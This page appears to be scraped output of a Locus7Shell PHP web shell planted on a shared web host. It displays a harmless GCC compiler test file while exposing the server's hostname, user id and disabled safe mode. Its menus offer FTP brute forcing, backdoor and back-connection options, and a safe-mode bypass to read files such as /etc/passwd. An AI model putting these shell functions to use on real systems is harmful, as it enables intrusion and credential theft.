Software: Apache. PHP/5.4.45 

uname -a: Linux webm056.cluster010.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue
Sep 17 08:14:20 UTC 2024 x86_64
 

uid=243112(mycochar) gid=100(users) groups=100(users)  

Safe-mode: OFF (not secure)

/home/mycochar/www/image/photo/gcc-12.3.0/gcc/testsuite/gcc.c-torture/compile/   drwxr-xr-x
Free 0 B of 0 B (0%)
Your ip: 216.73.216.77 - Server ip: 213.186.33.19
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    

[Enumerate]    [Encoder]    [Tools]    [Proc.]    [FTP Brute]    [Sec.]    [SQL]    [PHP-Code]    [Backdoor Host]    [Back-Connection]    [milw0rm it!]    [PHP-Proxy]    [Self remove]
    


Viewing file:     pr68538.c (1.25 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
struct percpu_counter {
    signed long long count;
};
struct blkg_rwstat {
    struct percpu_counter cpu_cnt[4];
};
struct cfq_group {
    struct blkg_rwstat service_time;
};
struct cfq_queue {
    struct cfq_group *group;
};
struct request {
    struct cfq_queue *active_queue;
    unsigned long long cmd_flags;
    void *priv;
};
static void blkg_rwstat_add(struct blkg_rwstat *rwstat, int rw, unsigned long long val)
{
    struct percpu_counter *cnt;
    if (rw & 1)
        cnt = &rwstat->cpu_cnt[1];
    else
        cnt = &rwstat->cpu_cnt[0];
    cnt->count += val;
    if (rw & 2)
        cnt = &rwstat->cpu_cnt[2];
    else
        cnt = &rwstat->cpu_cnt[3];
    cnt->count += val;
}
extern unsigned long long rq_start_time_ns(void);
extern unsigned long long rq_io_start_time_ns(void);
extern int rq_is_sync(void);
extern void cfq_arm_slice_timer(void);
void cfq_completed_request(struct request *rq)
{
    struct cfq_queue *queue = rq->priv;
    int sync = rq_is_sync();
    struct cfq_group *group = queue->group;
    long long start_time = rq_start_time_ns();
    long long io_start_time = rq_io_start_time_ns();
    int rw = rq->cmd_flags;

    if (io_start_time < 1)
        blkg_rwstat_add(&group->service_time, rw, 1 - io_start_time);
    blkg_rwstat_add(0, rw, io_start_time - start_time);

    if (rq->active_queue == queue && sync)
        cfq_arm_slice_timer();
}


Enter:
 
Select:
 

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

Search
  - regexp 

Upload
 
[ ok ]

Make Dir
 
[ ok ]
Make File
 
[ ok ]

Go Dir
 
Go File
 

--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | www.LOCUS7S.com | Generation time: 0.0061 ]--